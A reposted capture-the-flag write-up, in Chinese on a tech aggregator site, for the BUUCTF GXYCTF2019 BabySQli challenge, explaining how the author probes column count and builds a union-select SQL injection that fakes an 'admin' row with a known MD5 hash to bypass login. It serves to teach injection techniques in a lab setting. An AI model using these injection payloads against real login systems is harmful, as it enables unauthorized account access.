IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 大数据 -> buuctf-[GXYCTF2019]BabySQli WP(小宇特详解) -> 正文阅读

[大数据]buuctf-[GXYCTF2019]BabySQli WP(小宇特详解)

buuctf-[GXYCTF2019]BabySQli WP(小宇特详解)

这里先看一下源码

查看search.php

这里先base32解码,然后在base64解码得到

select * from user where username = ‘$name’

这里先尝试一下user是admin,然后password是123456,回显wrong pass

而尝试一下其他的user和其他密码发现这里回显的是wrong user

这个现象给了信息,说明admin的user是对的只是密码是错的

这里用联合查询user=’ union select select 1,2,3 #这里回显的是wrong user

而使用user=’ union select 1,2,3,4 #报错了

这里有三个字段,这里常规的数据库的话是id,user,password

这里进行验证,’ union select 1,‘admin’,3#不报错并且回显wrong pass

这里我没找到提示是MD5加密,但是在其他的博客上提示是MD5加密的

这里利用联合查询的时候当你查询的数据不存在是,联合查询就会构造虚拟的数据

这里我特意搭建了一个环境,我用的是phpstudy小皮版

我先创建了一个数据库,然后里面的表的内容如下

然后进行查询

select * from user where username='0' union select 0,'admin','670b14728ad9902aecba32e22fa4f6bd'

这里直接生成了一个虚拟数据

利用这个原理构造payload

username:'union select 1,'admin','670b14728ad9902aecba32e22fa4f6bd'#
password:000000
  大数据 最新文章
实现Kafka至少消费一次
亚马逊云科技:还在苦于ETL?Zero ETL的时代
初探MapReduce
【SpringBoot框架篇】32.基于注解+redis实现
Elasticsearch:如何减少 Elasticsearch 集
Go redis操作
Redis面试题
专题五 Redis高并发场景
基于GBase8s和Calcite的多数据源查询
Redis——底层数据结构原理
上一篇文章      下一篇文章      查看所有文章
加:2022-01-29 23:09:14  更:2022-01-29 23:09:35 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/24 14:24:47-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码